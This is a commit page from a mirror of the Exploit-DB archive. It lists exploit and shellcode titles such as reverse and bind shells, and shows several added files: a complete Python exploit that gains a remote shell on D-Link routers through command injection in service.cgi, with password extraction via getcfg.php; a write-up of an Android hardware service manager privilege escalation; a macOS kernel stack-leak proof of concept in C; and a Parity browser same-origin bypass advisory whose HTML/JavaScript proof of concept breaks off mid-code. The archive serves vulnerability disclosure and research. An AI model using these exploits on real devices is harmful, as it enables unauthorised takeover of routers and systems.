bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-01-12

Browse source 
31 changes to exploits/shellcodes

MiniUPnP MiniUPnPc < 2.0 - Remote Denial of Service
Android - Hardware Service Manager Arbitrary Service Replacement due to getpidcon
Microsoft Windows - NTFS Owner/Mandatory Label Privilege Bypass
Microsoft Windows - NtImpersonateAnonymousToken AC to Non-AC Privilege Escalation
Microsoft Windows - NtImpersonateAnonymousToken LPAC to Non-LPAC Privilege Escalation
Microsoft Windows SMB Server (v1/v2) - Mount Point Arbitrary Device Open Privilege Escalation
macOS - 'process_policy' Stack Leak Through Uninitialized Field
Microsoft Edge Chakra - 'AppendLeftOverItemsFromEndSegment' Out-of-Bounds Read

Jungo Windriver 12.5.1 - Privilege Escalation
Jungo Windriver 12.5.1 - Local Privilege Escalation
Parity Browser < 1.6.10 - Bypass Same Origin Policy
Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping

VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' MITM Remote Code Execution
VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' Man In The Middle Remote Code Execution

Granding MA300 - Traffic Sniffing MitM Fingerprint PIN Disclosure
Granding MA300 - Traffic Sniffing Man In The Middle Fingerprint PIN Disclosure
LabF nfsAxe 3.7 FTP Client - Stack Buffer Overflow (Metasploit)
phpCollab 2.5.1 - Unauthenticated File Upload (Metasploit)

eVestigator Forensic PenTester - MITM Remote Code Execution
eVestigator Forensic PenTester - Man In The Middle Remote Code Execution

BestSafe Browser - MITM Remote Code Execution
BestSafe Browser - Man In The Middle Remote Code Execution
SKILLS.com.au Industry App - MITM Remote Code Execution
Virtual Postage (VPA) - MITM Remote Code Execution
SKILLS.com.au Industry App - Man In The Middle Remote Code Execution
Virtual Postage (VPA) - Man In The Middle Remote Code Execution

Trend Micro OfficeScan 11.0/XG (12.0) - MITM Remote Code Execution
Trend Micro OfficeScan 11.0/XG (12.0) - Man In The Middle Remote Code Execution
SAP NetWeaver J2EE Engine 7.40 - SQL Injection
D-Link Routers 110/412/615/815 < 1.03 - 'service.cgi' Arbitrary Code Execution

FreeBSD/x86 - Reverse TCP Shell (192.168.1.69:6969/TCP) Shellcode (129 bytes)
BSD/x86 - Reverse TCP Shell (192.168.2.33:6969/TCP) Shellcode (129 bytes)

FreeBSD/x86 - Bind TCP Password Shell (4883/TCP) Shellcode (222 bytes)
FreeBSD/x86 - Bind TCP Password /bin/sh Shell (4883/TCP) Shellcode (222 bytes)
Cisco IOS - New TTY / Privilege Level To 15 / Reverse Virtual Terminal Shell (21/TCP) Shellcode
Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)
Cisco IOS - New TTY / Privilege Level To 15 / No Password Shellcode
HPUX - execve /bin/sh Shellcode (58 bytes)
Cisco IOS - New TTY + Privilege Level To 15 + Reverse Virtual Terminal Shell (21/TCP) Shellcode
Cisco IOS/PowerPC - New VTY + Password (1rmp455) Shellcode (116 bytes)
Cisco IOS - New TTY + Privilege Level To 15 + No Password Shellcode
HP-UX - execve /bin/sh Shellcode (58 bytes)

OpenBSD/x86 - execve /bin/sh Shellcode (23 Bytes)
OpenBSD/x86 - execve /bin/sh Shellcode (23 bytes)
ARM - Bind TCP Shell (0x1337/TCP) Shellcode
ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode
ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode
ARM - ifconfig eth0 192.168.0.2 up Shellcode
Linux/ARM - Bind TCP Shell (0x1337/TCP) Shellcode
Linux/ARM - Bind TCP Listener (68/UDP) + Reverse TCP Shell (192.168.0.1:67/TCP) Shellcode
Linux/ARM - Bind TCP Listener (0x1337/TCP) + Receive Shellcode + Payload Loader Shellcode
Linux/ARM - ifconfig eth0 192.168.0.2 up Shellcode

FreeBSD/x86 - Bind TCP Shell (31337/TCP) + Fork Shellcode (111 bytes)
FreeBSD/x86 - Bind TCP /bin/sh Shell (31337/TCP) + Fork Shellcode (111 bytes)

Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 Bytes)
Windows x86 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Persistent Access Shellcode (494 bytes)

Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 Bytes)
Windows 7 x86 - Bind TCP Shell (4444/TCP) Shellcode (357 bytes)

Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 Bytes)
Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 bytes)

Linux/x86 - exceve /bin/sh Encoded Shellcode (44 Bytes)
Linux/ARM (Raspberry Pi) - Bind TCP /bin/sh Shell (0.0.0.0:4444/TCP) Null-Free Shellcode (112 bytes)
FreeBSD/x86-64 - execve /bin/sh Shellcode (28 bytes)
FreeBSD/x86-64 - Bind TCP Password (R2CBw0cr) /bin/sh Shell Shellcode (127 bytes)
FreeBSD/x86 - execv(/bin/sh) Shellcode (23 bytes)
FreeBSD/x86 - //sbin/pfctl -F all Shellcode (47 bytes)
FreeBSD/x86 - Bind TCP /bin/sh Shell (41254/TCP) Shellcode (115 bytes)
FreeBSD - reboot() Shellcode (15 Bytes)
IRIX - execve(/bin/sh -c) Shellcode (72 bytes)
IRIX - execve(/bin/sh) Shellcode (43 bytes)
IRIX - Bind TCP /bin/sh Shell Shellcode (364 bytes)
IRIX - execve(/bin/sh) Shellcode (68 bytes)
IRIX - stdin-read Shellcode (40 bytes)
Linux/ARM - execve(_/bin/sh__ NULL_ 0) Shellcode (34 bytes)
Linux/x86 - exceve /bin/sh Encoded Shellcode (44 bytes)

Linux/x86 - Read /etc/passwd Shellcode (54 Bytes)
Linux/x86 - Read /etc/passwd Shellcode (54 bytes)

Linux/x86-64 - execve /bin/sh Shellcode (21 Bytes)
Linux/x86-64 - execve /bin/sh Shellcode (21 bytes)
This commit is contained in:
Offensive Security 2018-01-12 05:02:17 +00:00
parent a7ddd8282b
commit 81d6f781ab
31 changed files with 5393 additions and 27 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

95
exploits/android/dos/43513.txt Normal file
View file

@ -0,0 +1,95 @@
This bug is similar to Jann Horn's issue (https://bugs.chromium.org/p/project-zero/issues/detail?id=851) -- credit should go to him.
The hardware service manager allows the registration of HAL services. These services are used by the vendor domain and other core processes, including system_server, surfaceflinger and hwservicemanager.
Similarly to the "regular" service manager ("servicemanager"), the hardware service manager is the context manager node for the "hwbinder" device, allowing it to mediate access to all hardware services registered under it. This is done by allowing its users to list, access or insert services into its registry, identified by a unique full-qualified name and an instance name (see http://androidxref.com/8.0.0_r4/xref/system/libhidl/transport/manager/1.0/IServiceManager.hal).
The "add" binder call allows callers to supply a binder instance to be registered with the hardware service manager. When issued, the call is unpacked by the auto-generated hidl stub, and then passed to "ServiceManager::add" for processing. Here is a snippet from that function (http://androidxref.com/8.0.0_r4/xref/system/hwservicemanager/ServiceManager.cpp#172):
1. Return<bool> ServiceManager::add(const hidl_string& name, const sp<IBase>& service) {
2. ...
3. // TODO(b/34235311): use HIDL way to determine this
4. // also, this assumes that the PID that is registering is the pid that is the service
5. pid_t pid = IPCThreadState::self()->getCallingPid();
6.
7. auto ret = service->interfaceChain([&](const auto &interfaceChain) {
8. if (interfaceChain.size() == 0) {
9. return;
10. }
11.
12. // First, verify you're allowed to add() the whole interface hierarchy
13. for(size_t i = 0; i < interfaceChain.size(); i++) {
14. std::string fqName = interfaceChain[i];
15. if (!mAcl.canAdd(fqName, pid)) {
16. return;
17. }
18. }
19. ...
20.}
As we can see in the snippet above, the function first records the pid of the calling process (populated into the transaction by the binder driver). Then, it issues a (non-oneway) transaction to the given service binder, in order to retrieve the list of interfaces corresponding to the given instance. As the comment correctly notes (lines 3-4), this approach is incorrect, for two reasons:
1. The given service can be hosted in a different process to the one making the binder call
2. Recording the pid does not guarantee that the calling process cannot transition from zombie to dead, allowing other processes to take its place
The pid is later used by the AccessControl class in order to perform the access control check, using getpidcon (http://androidxref.com/8.0.0_r4/xref/system/hwservicemanager/AccessControl.cpp#63). Consequently, an attack similar to the one proposed by Jann in the original bug is possible - namely, creating a race condition where the issuing process transitions to dead state, and a new privileged tid to be created in its place, causing the access control checks to be bypassed (by using the privileged process's SELinux context).
Furthermore, this code would have been susceptible to another vulnerability, by James Forshaw (https://bugs.chromium.org/p/project-zero/issues/detail?id=727) - namely, the caller can issue a "oneway" binder transaction in the "add" call, causing the calling pid field recorded by the driver to be zero. In such a case, getpidcon(0) is called, which would have returned the current process's context (the hardware service manager can register several critical services, including the "HIDL manager" and the "Token Manager"). However, this behaviour has since been changed in upstream libselinux (https://patchwork.kernel.org/patch/8395851/), making getpidcon(0) calls invalid, and therefore avoiding this issue.
However, an alternate exploit flow exists, which allows the issue to be exploited deterministically with no race condition required. Since the code above issues a non-oneway binder transaction on the given binder object, this allows the following attack flow to occur:
1. Process A creates a hardware binder service
2. Process A forks to create process B
3. Process B receives binder object from process A
4. Process B registers the binder object with the hardware service manager, by calling the "add" binder call
5. Hardware service manager executes "ServiceManager::add", records process B's pid, calls the (non-oneway) "interfaceChain" binder call on the given binder
6. Process A receives the "interfaceChain" binder call
7. Process A kills process B
8. Process A forks and kills the child processes, until reaching the pid before process B's pid
9. Process A calls the "loadSoundEffects" binder call on the "audio" service, spawning a new long-lived thread in system_server ("SoundPoolThread")
10. The new thread occupies process B's pid
11. Process A completes the "interfaceChain" transaction
12. Hardware service manager uses system_server's context to perform the ACL check
This attack flow allows a caller to replace any service published by system_server, including "IBase", "ISchedulingPolicyService" and "ISensorManager", or register any other services of behalf of system_server.
Note that in order to pass the binder instance between process A and process B, the "Token Manager" service can be used. This service allows callers to insert binder objects and retrieve 20-byte opaque tokens representing them. Subsequently, callers can supply the same 20-byte token, and retrieve the previously inserted binder object from the service. The service is accessible even to (non-isolated) app contexts (http://androidxref.com/8.0.0_r4/xref/system/sepolicy/private/app.te#188).
I'm attaching a PoC which performs the aforementioned attack flow, resulting in the "IBase" service (default instance) being hijacked. Running the PoC should result in the following output:
pid=23701
service manager: 0x7d0b44b000
token manager: 0x7d0b44b140
TOKEN: 0502010000000000B78268179E69C3B0EB6AEBFF60D82B42732F0FF853E8773379A005493648BCF1
05 02 01 00 00 00 00 00 B7 82 68 17 9E 69 C3 B0 EB 6A EB FF 60 D8 2B 42 73 2F 0F F8 53 E8 77 33 79 A0 05 49 36 48 BC F1
pid=23702
service manager: 0x72e544e000
token manager: 0x72e544e0a0
token manager returned binder: 0x72e544e140
Registering service...
interfaceChain called!
load: 0
Killing the child PID: 0
waitpid: 23702
Cycling to pid
unload: 0
load: 0
After running the PoC, the IBase service will be replaced with our own malicious service. This can be seen be running "lshal":
All binderized services (registered services through hwservicemanager)
Interface Server Clients
...
android.hidl.base@1.0::IBase/default 23701 (<-our pid) 463
Note that this attack can also be launched from an application context (with no required permissions), as apps can access both the "hwbinder" (http://androidxref.com/8.0.0_r4/xref/system/sepolicy/private/app.te#186) and the token service (http://androidxref.com/8.0.0_r4/xref/system/sepolicy/private/app.te#188).
The attached PoC should be built as part of the Android source tree, by extracting the source files into "frameworks/native/cmds/hwservice", and running a build (e.g., "mmm hwservice"). The resulting binary ("hwservice") contains the PoC code.
It should be noted that the hardware service manager uses the PID in all other calls ("get", "getTransport", "list", "listByInterface", "registerForNotifications", "debugDump", "registerPassthroughClient") as well.
These commands are all similarly racy (due to the getpidcon(...) usage), but are harder to exploit, as no binder call takes place prior to the ACL check.
Proof of Concept:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/43513.zip

233
exploits/hardware/webapps/43496.py Executable file
View file

@ -0,0 +1,233 @@
#!/usr/bin/python
# Exploit Title: D-Link WAP 615/645/815 < 1.03 service.cgi RCE
# Exploit Author: Cr0n1c
# Vendor Homepage: us.dlink.com
# Software Link: https://github.com/Cr0n1c/dlink_shell_poc/blob/master/dlink_auth_rce
# Version: 1.03
# Tested on: D-Link 815 v1.03
import argparse
import httplib
import random
import re
import requests
import string
import urllib2
DLINK_REGEX = ['Product Page : <a href="http://support.dlink.com" target="_blank">(.*?)<',
'<div class="modelname">(.*?)</div>',
'<div class="pp">Product Page : (.*?)<a href="javascript:check_is_modified">'
]
def dlink_detection():
try:
r = requests.get(URL, timeout=10.00)
except requests.exceptions.ConnectionError:
print "Error: Failed to connect to " + URL
return False
if r.status_code != 200:
print "Error: " + URL + " returned status code " + str(r.status_code)
return False
for rex in DLINK_REGEX:
if re.search(rex, r.text):
res = re.findall(rex, r.text)[0]
return res
print "Warning: Unable to detect device for " + URL
return "Unknown Device"
def create_session():
post_content = {"REPORT_METHOD": "xml",
"ACTION": "login_plaintext",
"USER": "admin",
"PASSWD": PASSWORD,
"CAPTCHA": ""
}
try:
r = requests.post(URL + "/session.cgi", data=post_content, headers=HEADER)
except requests.exceptions.ConnectionError:
print "Error: Failed to access " + URL + "/session.cgi"
return False
if not (r.status_code == 200 and r.reason == "OK"):
print "Error: Did not recieve a HTTP 200"
return False
if not re.search("<RESULT>SUCCESS</RESULT>", r.text):
print "Error: Did not get a success code"
return False
return True
def parse_results(result):
print result[100:]
return result
def send_post(command, print_res=True):
post_content = "EVENT=CHECKFW%26" + command + "%26"
method = "POST"
if URL.lower().startswith("https"):
handler = urllib2.HTTPSHandler()
else:
handler = urllib2.HTTPHandler()
opener = urllib2.build_opener(handler)
request = urllib2.Request(URL + "/service.cgi", data=post_content, headers=HEADER)
request.get_method = lambda: method
try:
connection = opener.open(request)
except urllib2.HTTPError:
print "Error: failed to connect to " + URL + "/service.cgi"
return False
except urllib2.HTTPSError:
print "Error: failed to connect to " + URL + "/service.cgi"
return False
if not connection.code == 200:
print "Error: Recieved status code " + str(connection.code)
return False
attempts = 0
while attempts < 5:
try:
data = connection.read()
except httplib.IncompleteRead:
attempts += 1
else:
break
if attempts == 5:
print "Error: Chunking failed %d times, bailing." %attempts
return False
if print_res:
return parse_results(data)
else:
return data
def start_shell():
print "+" + "-" * 80 + "+"
print "| Welcome to D-Link Shell" + (" " * 56) + "|"
print "+" + "-" * 80 + "+"
print "| This is a limited shell that exploits piss poor programming. I created this |"
print "| to give you a comfort zone and to emulate a real shell environment. You will |"
print "| be limited to basic busybox commands. Good luck and happy hunting. |"
print "|" + (" " * 80) + "|"
print "| To quit type 'gtfo'" + (" " * 60) + "|"
print "+" + "-" * 80 + "+\n\n"
cmd = ""
while True:
cmd = raw_input(ROUTER_TYPE + "# ").strip()
if cmd.lower() == "gtfo":
break
send_post(cmd)
def query_getcfg(param):
post_data = {"SERVICES": param}
try:
r = requests.post(URL + "/getcfg.php", data=post_data, headers=HEADER)
except requests.exceptions.ConnectionError:
print "Error: Failed to access " + URL + "/getcfg.php"
return False
if not (r.status_code == 200 and r.reason == "OK"):
print "Error: Did not recieve a HTTP 200"
return False
if re.search("<message>Not authorized</message>", r.text):
print "Error: Not vulnerable"
return False
return r.text
def attempt_password_find():
# Going fishing in DEVICE.ACCOUNT looking for CWE-200 or no password
data = query_getcfg("DEVICE.ACCOUNT")
if not data:
return False
res = re.findall("<password>(.*?)</password>", data)
if len(res) > 0 and res != "=OoXxGgYy=":
return res[0]
# Did not find it in first attempt
data = query_getcfg("WIFI")
if not data:
return False
res = re.findall("<key>(.*?)</key>", data)
if len(res) > 0:
return res[0]
# All attempts failed, just going to return and wish best of luck!
return False
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="D-Link 615/815 Service.cgi RCE")
parser.add_argument("-p", "--password", dest="password", action="store", default=None,
help="Password for the router. If not supplied then will use blank password.")
parser.add_argument("-u", "--url", dest="url", action="store", required=True,
help="[Required] URL for router (i.e. http://10.1.1.1:8080)")
parser.add_argument("-x", "--attempt-exploit", dest="attempt_exploit", action="store_true", default=False,
help="If flag is set, will attempt CWE-200. If that fails, then will attempt to discover "
"wifi password and use it.")
args = parser.parse_args()
HEADER = {"Cookie": "uid=" + "".join(random.choice(string.letters) for _ in range(10)),
"Host": "localhost",
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8"
}
URL = args.url.lower().strip()
if not URL.startswith("http"):
URL = "http://" + URL
ROUTER_TYPE = dlink_detection()
if not ROUTER_TYPE:
print "EXITING . . ."
exit()
if args.attempt_exploit and args.password is None:
res = attempt_password_find()
if res:
PASSWORD = res
else:
PASSWORD = ""
print "[+] Switching password to: " + PASSWORD
elif args.password:
PASSWORD = args.password
else:
PASSWORD = ""
if not create_session():
print "EXITING . . ."
exit()
if len(send_post("ls", False)) == 0:
print "Appears this device [%s] is not vulnerable. EXITING . . ." %ROUTER_TYPE
exit()
start_shell()

84
exploits/macos/dos/43521.c Normal file
View file

@ -0,0 +1,84 @@
/*
The syscall
process_policy(scope=PROC_POLICY_SCOPE_PROCESS, action=PROC_POLICY_ACTION_GET, policy=PROC_POLICY_RESOURCE_USAGE, policy_subtype=PROC_POLICY_RUSAGE_CPU, attrp=<userbuf>, target_pid=0, target_threadid=<ignored>)
causes 4 bytes of uninitialized kernel stack memory to be written to userspace.
The call graph looks as follows:
process_policy
handle_cpuuse
proc_get_task_ruse_cpu
task_get_cpuusage
[writes scope=1/2/4/0]
[always returns zero]
[writes policyp if scope!=0]
[always returns zero]
copyout
If task_get_cpuusage() set `*scope=0` because none of the flags
TASK_RUSECPU_FLAGS_PERTHR_LIMIT, TASK_RUSECPU_FLAGS_PROC_LIMIT and TASK_RUSECPU_FLAGS_DEADLINE are set in task->rusage_cpu_flags,
proc_get_task_ruse_cpu() does not write anything into `*policyp`, meaning that `cpuattr.ppattr_cpu_attr` in
handle_cpuuse() remains uninitialized. task_get_cpuusage() and proc_get_task_ruse_cpu() always return zero,
so handle_cpuuse() will copy `cpuattr`, including the unititialized `ppattr_cpu_attr` field, to userspace.
Tested on a Macmini7,1 running macOS 10.13 (17A405), Darwin 17.0.0:
$ cat test.c
*/
#include <stdint.h>
#include <stdio.h>
#include <inttypes.h>
struct proc_policy_cpuusage_attr {
uint32_t ppattr_cpu_attr;
uint32_t ppattr_cpu_percentage;
uint64_t ppattr_cpu_attr_interval;
uint64_t ppattr_cpu_attr_deadline;
};
void run(void) {
int retval;
struct proc_policy_cpuusage_attr attrs = {0,0,0,0};
asm volatile(
"mov $0x02000143, %%rax\n\t" // process_policy
"mov $1, %%rdi\n\t" // PROC_POLICY_SCOPE_PROCESS
"mov $11, %%rsi\n\t" // PROC_POLICY_ACTION_GET
"mov $4, %%rdx\n\t" // PROC_POLICY_RESOURCE_USAGE
"mov $3, %%r10\n\t" // PROC_POLICY_RUSAGE_CPU
"mov %[userptr], %%r8\n\t"
"mov $0, %%r9\n\t" // PID 0 (self)
// target_threadid is unused
"syscall\n\t"
: //out
"=a"(retval)
: //in
[userptr] "r"(&attrs)
: //clobber
"cc", "memory", "rdi", "rsi", "rdx", "r10", "r8", "r9"
);
printf("retval = %d\n", retval);
printf("ppattr_cpu_attr = 0x%"PRIx32"\n", attrs.ppattr_cpu_attr);
printf("ppattr_cpu_percentage = 0x%"PRIx32"\n", attrs.ppattr_cpu_percentage);
printf("ppattr_cpu_attr_interval = 0x%"PRIx64"\n", attrs.ppattr_cpu_attr_interval);
printf("ppattr_cpu_attr_deadline = 0x%"PRIx64"\n", attrs.ppattr_cpu_attr_deadline);
}
int main(void) {
run();
return 0;
}
/*
$ gcc -Wall -o test test.c
$ ./test
retval = 0
ppattr_cpu_attr = 0x1a180ccb
ppattr_cpu_percentage = 0x0
ppattr_cpu_attr_interval = 0x0
ppattr_cpu_attr_deadline = 0x0
That looks like the lower half of a pointer or so.
*/

3
exploits/multiple/dos/37723.py
View file

@ -1,3 +1,5 @@
#!/usr/bin/env python
# Exploit Title: PoC for BIND9 TKEY DoS
# Exploit Author: elceef
# Software Link: https://github.com/elceef/tkeypoc/
@ -5,7 +7,6 @@
# Tested on: multiple
# CVE : CVE-2015-5477
#!/usr/bin/env python
import socket
import sys

1137
exploits/multiple/dos/43501.txt Normal file
View file

File diff suppressed because one or more lines are too long

669
exploits/multiple/local/43499.txt Normal file
View file

@ -0,0 +1,669 @@
VuNote
======
Author: <github.com/tintinweb>
Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2017-18016
Version: 0.3
Date: Jun 16th, 2017
Tag: parity same origin policy bypass webproxy token reuse
Overview
--------
Name: parity
Vendor: paritytech
References: * https://parity.io/ [1]
Version: 1.6.8
Latest Version: 1.7.12 (stable) - fixed
1.8.5 (beta) - fixed
Other Versions: <= 1.6.10 (stable) - vulnerable
Platform(s): cross
Technology: rust js
Vuln Classes: CWE-346
Origin: local (remote website, malicious dapp)
Min. Privs.: ---
CVE: CVE-2017-18016
Description
---------
quote website [1]
>Parity Technologies is proud to present our powerful new Parity Browser. Integrated directly into your Web browser, Parity is the fastest and most secure way of interacting with the Ethereum network.
Summary
-------
PoC: https://tintinweb.github.io/pub/pocs/cve-2017-18016/ [4]
> Parity Browser <=1.6.8 allows remote attackers to bypass the Same Origin Policy and obtain sensitive information by requesting other websites via the Parity web proxy engine (reusing the current website's token, which is not bound to an origin).
![parity cookie](sop_cookie.gif)
**(A)** Ethereum Parity's built-in dapp/web-browsing functionality is
rendering browser same-origin policy (SOP) ineffective by proxying
requests with the parity main process. As a result, any website
navigated to ends up being origin http://localhost:8080. This also means
that all websites navigated to share the same origin and thus are not
protected by the browser SOP allowing any proxied website/dapp to access
another proxied website/dapp's resources (Cookies, ...).
//see attached PoC - index.html / PoC
![parity frame](sop_frame.gif)
**(B)** Worse, due to the structure of proxy cache urls and the fact that they
contain a reusable non-secret non-url specific cache-token it is
possible for one proxied website/dapp to navigate to any other proxied
website/dapp gaining full script/XHR control due to **(A)** the SOP being
applied without any restrictions. This could allow a malicious
website/dapp to take control of another website/dapp, performing user
interactions, XHR or injecting scripts/DOM elements to mislead the
user or to cause other unspecified damage.
When navigating to a website with the built-in parity webbrowser a webproxy request
token is requested and sent along an encoded request for an url. For example, navigating
parity to http://oststrom.com the url gets turned into a proxy url like http://127.0.0.1:8080/web/8X4Q4EBJ71SM2CK6E5AQ6YBNB4NPGX3ME0X2YBVFEDT76X3JDXPJWRVFDM of
the form http://127.0.0.1:8080/web/[base32_encode(token+url)]. A malicious dapp can use
this information to decode its own url, extract the token and reuse it for any other
url as the token is not locked to the url. The PoC exploits this in order to load any
other website into a same-origin iframe by reusing the proxy token.
Code see [2]
//see attached PoC - index.html / PoC
Proof of Concept
----------------
Prerequisites:
* (if hosted locally) modify /etc/hosts to resolve your testdomain to your webserver
* make `index.html` accessible on a webserver (e.g. `cd /path/to/index.html; python -m SimpleHTTPServer 80`)
1. launch parity, navigate to the built-in webbrowser (http://127.0.0.1:8180/#/web)
2. navigate the built-in parity webbrowser to where the PoC `index.html` is hosted (e.g. [4])
3. follow the instructions.
4. Issue 1: navigate to some websites to have them set cookies, reload the PoC page and click "Display Cookies". Note that while the main request is proxied by parity, subsequent calls might not be (e.g. xhr, resources). That means you'll only see cookies set by the main site as only the initial call shares the origin `localhost:8080`.
5. Issue 2: enter an url into the textbox and hit `Spawn SOP Iframe`. A new iframe will appear on the bottom of the page containing the proxied website. Note that the calling website has full script/dom/xhr access to the proxied target. You can also use the "Display Cookies" button from Issue 1 to show cookies that have been merged into the origin by loading the proxied iframe.
6. Demo 2: Just a PoC to find local-lan web interfaces (e.g. your gateways web interface) and potentially mess with its configuration (e.g. router with default password on your lan being reconfigured by malicious dapp that excploits the token reuse issue 2)
//tested with latest chrome
Notes
-----
* Commit [3] (first in 1.7.0)
* Does not fix Issue #1 - sites are generally put into same origin due to proxy
* Fixes Issue #2 - Token Reuse
* Parity now added a note that browsing websites with their browser is insecure
![parity fixed](v171.png)
* Issue #1 is not yet fixed as the cookie of instagram.com is still shown.
* Parity v1.7.12 added a note.
Timeline
--------
31.05.2017 - first contact, forwarded to parity
17.06.2017 - provided PoC
19.06.2017 - response: not critical issue due to internal browser being a dapp browser and not a generic web browser
20.06.2017 - provided more information
21.06.2017 - response: not critical issue due to internal browser being a dapp browser and not a generic web browser
21.06.2017 - response: follow-up - looking into means to lock the token to a website
22.06.2017 - fix ready [3]
10.01.2018 - public disclosure
References
----------
[1] https://parity.io/
[2] https://github.com/paritytech/parity/blame/e8b418ca03866fd952d456830b30e9225c81035a/dapps/src/web.rs
[3] https://github.com/paritytech/parity/commit/53609f703e2f1af76441344ac3b72811c726a215
[4] https://tintinweb.github.io/pub/pocs/cve-2017-18016/
Contact
-------
https://github.com/tintinweb
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="cve-2017-18016 paritytech parity same origin policy bypass sop">
<meta name="author" content="github.com/tintinweb">
<!--<link rel="icon" href="favicon.ico">-->
<title>Ethereum | Parity SOP Vulnerability</title>
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css" integrity="sha384-BVYiiSIFeK1dGmJRAkycuHAHRg32OmUcww7on3RYdg4Va+PmSTsz/K68vbdEjh4u" crossorigin="anonymous">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap-theme.min.css" integrity="sha384-rHyoN1iRsVXV4nD0JutlnGaslCJuC7uwjduW9SVrLvRYooPp2bWYgmgJQIXwl/Sp" crossorigin="anonymous">
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js" integrity="sha384-Tc5IQib027qvyjSMfHjOMaLkfuWVxZxUPnCJA7l2mCWNIpG9mGCD8wGNIcPD7Txa" crossorigin="anonymous"></script>
<script type="text/javascript">
;(function(){
// This would be the place to edit if you want a different
// Base32 implementation
var alphabet = '0123456789ABCDEFGHJKMNPQRSTVWXYZ'.toLowerCase()
var alias={}
//var alias = { o:0, i:1, l:1, s:5 }
/**
* Build a lookup table and memoize it
*
* Return an object that maps a character to its
* byte value.
*/
var lookup = function() {
var table = {}
// Invert 'alphabet'
for (var i = 0; i < alphabet.length; i++) {
table[alphabet[i]] = i
}
// Splice in 'alias'
for (var key in alias) {
if (!alias.hasOwnProperty(key)) continue
table[key] = table['' + alias[key]]
}
lookup = function() { return table }
return table
}
/**
* A streaming encoder
*
* var encoder = new base32.Encoder()
* var output1 = encoder.update(input1)
* var output2 = encoder.update(input2)
* var lastoutput = encode.update(lastinput, true)
*/
function Encoder() {
var skip = 0 // how many bits we will skip from the first byte
var bits = 0 // 5 high bits, carry from one byte to the next
this.output = ''
// Read one byte of input
// Should not really be used except by "update"
this.readByte = function(byte) {
// coerce the byte to an int
if (typeof byte == 'string') byte = byte.charCodeAt(0)
if (skip < 0) { // we have a carry from the previous byte
bits |= (byte >> (-skip))
} else { // no carry
bits = (byte << skip) & 248
}
if (skip > 3) {
// not enough data to produce a character, get us another one
skip -= 8
return 1
}
if (skip < 4) {
// produce a character
this.output += alphabet[bits >> 3]
skip += 5
}
return 0
}
// Flush any remaining bits left in the stream
this.finish = function(check) {
var output = this.output + (skip < 0 ? alphabet[bits >> 3] : '') + (check ? '$' : '')
this.output = ''
return output
}
}
/**
* Process additional input
*
* input: string of bytes to convert
* flush: boolean, should we flush any trailing bits left
* in the stream
* returns: a string of characters representing 'input' in base32
*/
Encoder.prototype.update = function(input, flush) {
for (var i = 0; i < input.length; ) {
i += this.readByte(input[i])
}
// consume all output
var output = this.output
this.output = ''
if (flush) {
output += this.finish()
}
return output
}
// Functions analogously to Encoder
function Decoder() {
var skip = 0 // how many bits we have from the previous character
var byte = 0 // current byte we're producing
this.output = ''
// Consume a character from the stream, store
// the output in this.output. As before, better
// to use update().
this.readChar = function(char) {
if (typeof char != 'string'){
if (typeof char == 'number') {
char = String.fromCharCode(char)
}
}
char = char.toLowerCase()
var val = lookup()[char]
if (typeof val == 'undefined') {
// character does not exist in our lookup table
return // skip silently. An alternative would be:
// throw Error('Could not find character "' + char + '" in lookup table.')
}
val <<= 3 // move to the high bits
byte |= val >>> skip
skip += 5
if (skip >= 8) {
// we have enough to preduce output
this.output += String.fromCharCode(byte)
skip -= 8
if (skip > 0) byte = (val << (5 - skip)) & 255
else byte = 0
}
}
this.finish = function(check) {
var output = this.output + (skip < 0 ? alphabet[bits >> 3] : '') + (check ? '$' : '')
this.output = ''
return output
}
}
Decoder.prototype.update = function(input, flush) {
for (var i = 0; i < input.length; i++) {
this.readChar(input[i])
}
var output = this.output
this.output = ''
if (flush) {
output += this.finish()
}
return output
}
/** Convenience functions
*
* These are the ones to use if you just have a string and
* want to convert it without dealing with streams and whatnot.
*/
// String of data goes in, Base32-encoded string comes out.
function encode(input) {
var encoder = new Encoder()
var output = encoder.update(input, true)
return output
}
// Base32-encoded string goes in, decoded data comes out.
function decode(input) {
var decoder = new Decoder()
var output = decoder.update(input, true)
return output
}
/**
* sha1 functions wrap the hash function from Node.js
*
* Several ways to use this:
*
* var hash = base32.sha1('Hello World')
* base32.sha1(process.stdin, function (err, data) {
* if (err) return console.log("Something went wrong: " + err.message)
* console.log("Your SHA1: " + data)
* }
* base32.sha1.file('/my/file/path', console.log)
*/
var crypto, fs
function sha1(input, cb) {
if (typeof crypto == 'undefined') crypto = require('crypto')
var hash = crypto.createHash('sha1')
hash.digest = (function(digest) {
return function() {
return encode(digest.call(this, 'binary'))
}
})(hash.digest)
if (cb) { // streaming
if (typeof input == 'string' || Buffer.isBuffer(input)) {
try {
return cb(null, sha1(input))
} catch (err) {
return cb(err, null)
}
}
